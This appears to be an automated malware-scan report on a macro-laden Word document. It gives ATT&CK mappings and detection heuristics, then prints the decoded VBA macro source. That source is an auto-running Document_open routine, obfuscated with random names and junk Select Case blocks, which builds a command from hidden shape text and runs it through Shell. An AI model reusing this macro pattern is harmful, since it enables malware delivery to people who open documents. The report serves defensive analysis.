MALICIOUS
272
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
The sample contains VBA macros that are automatically executed upon opening the document. These macros utilize Shell() calls to invoke cmd.exe with obfuscated parameters and also reference PowerShell, indicating an attempt to download and execute a secondary payload. The presence of these indicators strongly suggests a macro-based malware delivery mechanism.
Heuristics 9
-
ClamAV: Doc.Malware.Generic-6774449-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6774449-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
End Select FtwhjPq = Array(hiVNVLv, KLAVpY, GKEbDmF, Interaction.Shell(sEjRuJQiwTR, YlMXKBAfFO), qKtzWspp) Select Case SNnaZrTmLHiHUY -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9695 bytes |
SHA-256: 3fbf482cbb2dc66e86c9325705827acb199d7c61d407a5191c16f173836c2e35 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
217 of 259 identifiers look randomly generated (e.g. 'KVAZbOhGkhrQLjishEwKrFnV') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KatBHriqA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
Select Case EfzzTlQZzBMMktzrwGFK
Case 302985658
QIstfUNWUqiDVh = 292571205
LHnwtzHrASulJYSolC = 99715709
EZFvMcjVdjYPzcvwXvHSBBt = ChrB(87375796 / ChrB(167004301))
NwYtSSSBPlBrmRQmOTt = mjdTRpvwpCjsWlPkzjOF
Case 324156529
MJzfJqBPnZTuojSFccXVLNEI = 141838337
BfoiFnhpUTVmfE = 308291839
PHYcwiRrHlibmzEoJIo = ChrB(144101470 / ChrB(172414226))
UfMzMzjqzSbkzzj = 299235113
End Select
Select Case uGwHAXwXTzhoJFPAhrzj
Case 178087394
jOfVWJzUkrSzjDdMQEs = 94324861
aPwYCCBuwkQCWXkci = 8196952
XzPqVKYMXUavnMHIwjwUGw = ChrB(170551761 / ChrB(247474683))
CzKjskmDDqRLYcO = piZXpdpOOlvhhiYZdkTM
Case 88957913
ikorkVpzZEipQUANRYHv = 113958848
pEWURshoICQJzpj = 325493894
TZRMqzrREYQSuFRPXvkVPDw = ChrB(107467911 / ChrB(244416707))
fYHULiUjnWAuwEiCNTQWNwzu = 186897929
End Select
Select Case CqWjOCvTYSYPziwtiww
Case 262999763
OjkTddIGcBuPQBpjj = 88807945
wAUfRzwKnrsGhkLoHlN = 246845942
nNvQdAicGKvjWrNtETU = ChrB(201888119 / ChrB(119606277))
PkuNiFNiwVbBJnZOoz = ijjwXLtzuDSsGGSzL
Case 145497373
VcOYMZHVhaTpfVOjo = 229686226
XClHSffcVurpOsXdnUITWQ = 276321706
XbNnXsXiOXwNjVvt = ChrB(215813596 / ChrB(324962136))
aqkFzHrbPfPQHMakrRsFcW = 83218094
End Select
Select Case WBNZLPNajBIlhUnzhULqcGLi
Case 229906709
QiXQOEDnhZaTzoQ = 232642300
CoLbWccJIlOUPqiqEwiD = 120150696
EhumOYOXWataIuXftGuHGS = ChrB(269177929 / ChrB(119361431))
jwdtqljNPjihkOEvk = oboijSYEXIKjmscUi
Case 183742536
djoNNtKtwJsqMVCAqdAMK = 140114537
NXCizlFPjcKGizOboZZav = 207311510
wKjslrdPaIvbpKKNH = ChrB(291626007 / ChrB(300755074))
NBOUBbBLnkvpiFE = 157875276
End Select
Select Case qdGzvoGfpGBSIcMS
Case 309956009
XVlTJBdhGDONwRLvO = 254393417
XLofVkzvZcaBHHkMUZWTFTNh = 20513322
bIjHMNZTXFiqQiKFE = ChrB(37989858 / ChrB(213147658))
GGNErVrStDwHbE = rLSPMcojfiiJoJz
Case 99855011
BBKVviPqVGaUHbO = 73635738
TtmqTZSXhaNMDJtoqFa = 306615690
vhCYrVNOYCPwNpFcRhcswN = ChrB(27491890 / ChrB(18724386))
SwjjRVoQmXMkRcDEIJXz = 94764692
End Select
Set UYFNjwnYZ = KatBHriqA.Shapes(iLShBW + "sqicjuu" + wwPrJ).TextFrame
Select Case pHtYqjLtkJJvzjb
Case 182326675
HhYHiRYFQwABRiaFWzajF = 274545582
JnUkjRFrHHmfjpALq = 136857175
akKsTfjpciAvfROPTJ = ChrB(213325854 / ChrB(271443232))
KHttiwqPWlkLmPizvAFAbd = GMHOUajCJfiPcRw
Case 268314099
sZGzQjsBfQYIbpMhzmhWk = 142829940
pjajHAGhwMXHCXLqcOMoKH = 297746231
qSidfQRwWkQNpDlBZicwD = ChrB(220856429 / ChrB(68532068))
nvEIXjihqsppRcCf = 305400112
End Select
Select Case tnSTkBuLXZEMibRvjuBMP
Case 139868938
ohfMYDjijjNqJNcRbBjfQpSw = 244013638
GSzLUSYodmFpWI = 282899114
VfUlHiGcaKipizOibYwNiXLv = ChrB(117297368 / ChrB(140401773))
qLmfXoUUnczsYMWlKjiGi = WNwMdRwUYTmwQRofKBN
Case 205249475
GbjXBImBLjPESoYjLLD = 142608249
DfFZwFwiZhszzQlSpb = 58337930
SMkXuwcQwzpJJIDw = ChrB(174168355 / ChrB(325378365))
CpWmCWFUYmOVjvJ = 425149
End Select
Select Case DQNjqVZDvvlVpjAozaPjOF
Case 82920244
PazshOAtZOEvoLblzF = 311629366
ZRZzLIWDzHXzEpRQX = 218348860
jvsvbcEAnzijJKuzzA = ChrB(330320036 / ChrB(219330194))
swvRrGrwuKNSjOWhVzW = HiESaNnJsTPZzzo
Case 335059556
dkVMCtoQOavYPbDbaRJscqdT = 227569234
auoSmaXlrMBtFpP = 16497718
nrkcrMwZfiGTnHBi = ChrB(317948042 / ChrB(123141848))
cvoUAikqajLUcadqczdiipt = 41023947
End Select
Select Case DJjSEifhOHEkzYAS
Case 216068744
wKzMNlQNYfAwMaoOODGtw = 192285079
RnDfCmVkOwIMiNqwvBqGzhRu = 197735308
kJwLnlVNiZKGObDvlzENGBYH = ChrB(77062413 / ChrB(290354924))
XwjVIBGBLnDLWrU = RmonPCEwTqQqjlpzvjzR
Case 336745060
BFIZrHimiWlWHV = 151041559
pUrmBSkQSazDQqt = 20178989
MkjfqLzOhIuEMiUcqqdZ = ChrB(80536772 / ChrB(16269359))
UsHRJfVrciquknZzIuYTJ = 278668537
End Select
Select Case GNibNRBllmZvoajpmKnPRzA
Case 254644916
kzbRNXswaSSoIzUAvnwm = 235094167
zhMKvMwZINrwcTaUYPjwOHQB = 198596046
TPVKDzsowtFCbjzA = ChrB(69137988 / ChrB(37165150))
KVAZbOhGkhrQLjishEwKrFnV = OVozzOzKDUsSptvWtHHG
Case 191394453
WsnSwMvFEhftNtsGlTuFHMq = 172289972
KCowzfPDUzwLjSkPwPKnwjC = 196104398
WoLXmKCNblJHHGCQqsuwuF = ChrB(6747448 / ChrB(65581983))
IwjmviAKLbrDjhptwFjaHrJ = 54496962
End Select
sEjRuJQiwTR = UYFNjwnYZ.ContainingRange + HhrRnBjd + ajHJzv + UjiRn + MKKFC + pqscTK + zEbXX + RKvizJ + CfvRTSz + wKqQQUb + LKGdi + uRXVIaG + pzYtki + BYMiIAqT
Select Case jAIlFZTQiTWbIw
Case 303510966
zmjsoSownMJZAXK = 305096374
MtFEHjrOlQQlhhUDuFZwj = 90335172
MLztPtPKJbuwCoDqG = ChrB(292375651 / ChrB(195224360))
BYLGipWGSkwzwb = tJmbUVFGJnlSOqPTFFKPozr
Case 95165351
XJsZfwwbwKjTQJhvRBT = 298122397
HQCQqrnMEuSYBwMNhd = 280241664
rSjjApwdTWzYVDQtqIpEKP = ChrB(287610528 / ChrB(106244597))
uPMVikXcGfojTQBu = 65070697
End Select
Select Case zKbKBGuWwoZEJAjAbb
Case 32792983
wBOHEFZbqElTNpYhM = 344208
QPzVDsatLiiPBwzXwvTFvjTf = 300472905
FrTbwobcoBwjLP = ChrB(196905285 / ChrB(82696763))
wIpkVPSclsuDjwSbA = jakjtnZKwZPkDbiSWXESkc
Case 7269036
MwjYFEjEKdumdQPBLKTsMBoT = 138459047
ZvXiBHZlTzHAFrsKZ = 175611557
woGHCHZIImLHNDoflhcb = ChrB(261371211 / ChrB(87878369))
wRuKFbABbOmYbTnVacwQzIq = 302489075
End Select
Select Case QaFlwnNLRGYahDbhDEDKMLwH
Case 99461615
cQWKrlmwDhnjDAXC = 290651975
aVYPZzmqztkEizWmLwp = 50293079
nnjztuTADnKTWjtlN = ChrB(288516685 / ChrB(153415485))
AmtNzDpNRpbNkKnhoPf = SpwGalHRcBwERjO
Case 3091730
WApEGjNMwiMsLwzMRFLqmnN = 318663520
kPrWvBvnnSPqALGiudC = 307877144
RFAszdDJIimtjWTWpAh = ChrB(109699847 / ChrB(36565427))
dhWRuEIsJLBzTKqivXs = 193183989
End Select
Select Case IRJPZwTREAIQvADmDVOH
Case 232329794
ROLFijphBBzXrYndOihv = 241454098
jHiOqCbohGuczuDTS = 257953950
XwHRXJizaHkanuCfEWQp = ChrB(255714183 / ChrB(38375481))
TsdOYtavMtTNQcpK = LDBjzjGizPwwCzp
Case 113139361
nZuuGFzMYjUjmCOMKijEj = 145931801
WfbibwJwdwipQQKF = 325362337
UZAmBLMjkrTGME = ChrB(114055019 / ChrB(82270249))
PibYNOjqkHNwvAYmDMw = 82449979
End Select
Select Case jXHNotbPKBFlmffsYKG
Case 282891040
hNwliiEbtkUBdZ = 60110907
rViAdjDULSlRvH = 215224498
oZBJKbKLXoRRlkJFW = ChrB(268607460 / ChrB(217854902))
bqWzKcZLwmflDCMDXzsPLS = oSmibJjvGarpwCEzhCwP
Case 243848706
fNiXGiWvRdJOiiX = 304216272
CQqYKLNOASALNMDrjnYAEDzZ = 71962091
OjkUabnDwzujVCV = ChrB(56166336 / ChrB(40395521))
VkERGWCrwuuzSROBz = 216484479
End Select
Select Case MnwAHQMJwdzSXUawRpRWK
Case 49909692
JvXoNJAiLvvQhWEh = 89718402
NAjvjiEibLZjfaFb = 257237496
jbzAwzoWbDtbMID = ChrB(53522979 / ChrB(325835547))
dOLsjihoEiPVKGj = wlOMDjHMDBlzwRcXcwwYtrrR
Case 123521706
vJHFtmrNKStkDtH = 336755534
iziqmCrtMILFHuztwozFzI = 333383299
kHKiruERuBJTkQI = ChrB(49034278 / ChrB(104162790))
jijICXwrGEJtrawZ = 41558468
End Select
Select Case KTdRtoOOAOAILn
Case 91158619
IrTFRSplOEDaATmrPvUoI = 286990983
ZIlUjtppwpLIGpC = 254198587
irDoloOhcJtPSZbRitwjwFs = ChrB(167930896 / ChrB(103522429))
loKfBMJdKRoUoUX = HkvZdPkrYwGGsYwdZiCZWw
Case 46793727
GpPJcNFbJMzIdqiVETHF = 41275774
klTLvKRzQKdPTn = 4558619
OKriwjbpzizhVCpBaDF = ChrB(196779335 / ChrB(276693462))
SuJLvnfOXqUdFwObG = 25331237
End Select
Select Case wibEfBiDmKvCHwVDamZN
Case 302188220
iGzPSMcnvCjrMfBLWKjXzn = 12626716
KjFUtRilkIAUEQiRbzOtT = 108785457
pCOQPiWpqFPEiGHtiUwHE = ChrB(206851022 / ChrB(219950166))
GbRvzYIQuwQSfBS = NSJPoMzLTGkZUJj
Case 65649645
HJnMaqSwwJkqpOcBrt = 248372023
SRubGctojwlRGzXrit = 252783718
rSqCPUdrHXdPvoCpPMGw = ChrB(317826249 / ChrB(199345666))
CYSjsqkWzHJizbrL = 247684267
End Select
Const YlMXKBAfFO = 0
Select Case ESFVSWTaABXkPco
Case 272361450
jDYqmLwCCUGLEAPzoo = 133226252
biwsjEjBwSqOkobuTSSGJSQ = 12829640
OwAIlaoUwrwGfJhc = ChrB(308713271 / ChrB(27552668))
iraQZUfWWNjISufRIitNr = uowconIkiOOjXV
Case 266208257
boFESHMijLAsZtBrsbzl = 131567734
fsNljVulXKdcHFHmkmcNwdnQ = 72116205
MXnvYCLfINqjYrounpOwm = ChrB(321083104 / ChrB(231755479))
rKJGzCEwawIWwbl = 174947366
End Select
Select Case GuMAsiQXXhLwrmCw
Case 270577379
HFduNjnQzYQSUY = 220597050
CztZqjfpjGTNICHpGVZskMh = 192812114
cisGFMmOwjDFPMXZ = ChrB(262946599 / ChrB(92615355))
PZHzQbMzwoIqRPM = BmiaujwJSEkqICSw
Case 329542862
OmUkbfsMoaqtlpCwWnF = 257874490
iazfMrVqwWMsrBZs = 110633388
CihsYTZTunKjfqKN = ChrB(210308044 / ChrB(79682046))
FPoXWsDiAtncFFcDFf = 274190602
End Select
FtwhjPq = Array(hiVNVLv, KLAVpY, GKEbDmF, Interaction.Shell(sEjRuJQiwTR, YlMXKBAfFO), qKtzWspp)
Select Case SNnaZrTmLHiHUY
Case 332391987
YIcIAbHHQlQjiZYtW = 122032941
HjhGNqCkMwPcmQ = 233372889
vqtBrFjKnbmIljp = ChrB(246841523 / ChrB(14096174))
rhrBPRwqvIBJdQvVcC = QLBDXSlDuwcJdaQZBNu
Case 178958212
DAKYIizWNQHmJlJpiTi = 194081950
ErSwXjMrtHibANLr = 206245899
onhhiVXUoHjXtLzNw = ChrB(56529878 / ChrB(286587431))
lvlfTIZKIYwwwFupjXJ = 324988979
End Select
Select Case iJjBPrdwWwYEVFmDFJurWd
Case 99016873
tipGNmjMQUCRPthqXjBB = 146518008
LQXrtjhJQAuFHkBWikQMoBCU = 266645949
bEUnbNIuTYjWswfG = ChrB(23413607 / ChrB(11633140))
JlwpAARkJKJOCDhIdp = YhzMQdmMrUhhzAziafOT
Case 251785506
cwkKKhTKoCRZcpMY = 207295343
NoZQcdLNEYGcOVrO = 29298394
cGSFtjfiPYXISCzCGzkMVHww = ChrB(192891038 / ChrB(308657195))
LnwiOlMvYtIusk = 328622738
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.